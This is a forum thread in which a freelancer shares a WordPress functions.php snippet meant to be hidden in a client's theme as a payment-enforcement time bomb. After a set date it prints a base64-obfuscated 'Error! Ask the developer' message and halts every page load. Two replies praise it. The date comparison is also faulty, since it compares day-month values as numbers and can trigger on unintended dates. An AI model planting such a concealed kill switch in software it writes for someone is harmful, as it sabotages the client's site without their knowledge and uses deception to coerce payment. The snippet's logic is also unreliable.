News:

Daffodil International University Forum contains information about Open Text material, which is only intended for the significant learning purposes of the university students, faculty, other members, and the knowledge seekers of the entire world and is hoped that the offerings will aide in the distribution of reliable information and data relating to the many areas of knowledge.

Main Menu

How to get money from Odesk Buyer

Started by mahbub-web, April 23, 2012, 12:28:51 PM

Previous topic - Next topic

mahbub-web

যারা ওডেস্ক এ ওয়ার্ডপ্রেস এর কাজ করেন, তাদের জন্য এই ছোট ফাংশন টা বানালাম। কিছুদিন আগে এক ক্লাইন্ট এর কাজ করতে গিয়ে ক্লাইন্টের ভাব ভঙ্গি ভালো লাগলা না, তাই এই ফাংশন লিখে 1 week টাইম দিয়ে রাখলাম, 1 week পরে পেমেন্ট না করলে "Error! ask the developer" এই মেসেজ দেখাবে, আর পেজ লোড হবে না। যারা থিম এর কাজ করেন তারা functions.php এর মাঝে এইটা বসাতে পারেন। আর 3003 এর যায়গায় আপনার পছন্দ মত date বসিয়ে নিবেন। 1st 30 হল ডেট, 2nd 03 হলো মাস।Example: এপ্রিল এর ৫ তারিখের জন্য, 0504
বিঃ দ্রঃ দয়া করে অনৈতিক ভাবে এটা ব্যবহার করবেন না

function r_lifetime() {
$now = date(dm);

if($now > 3003)
{
echo base64_decode("RXJyb3IhIEFzayB0aGUgZGV2ZWxvcGVy");
die();
}
}
add_action('wp_head','r_lifetime');


Reference:  https://www.facebook.com/groups/Wordpress2Smashing/permalink/369558299752958

maruf2703

Great tips. Thanks a lot for sharing.
Maruf Abdullah Rion
BSc. in CSE
http://freelancermaruf.com

fatema nusrat chowdhury

Very informative post. Thank you for sharing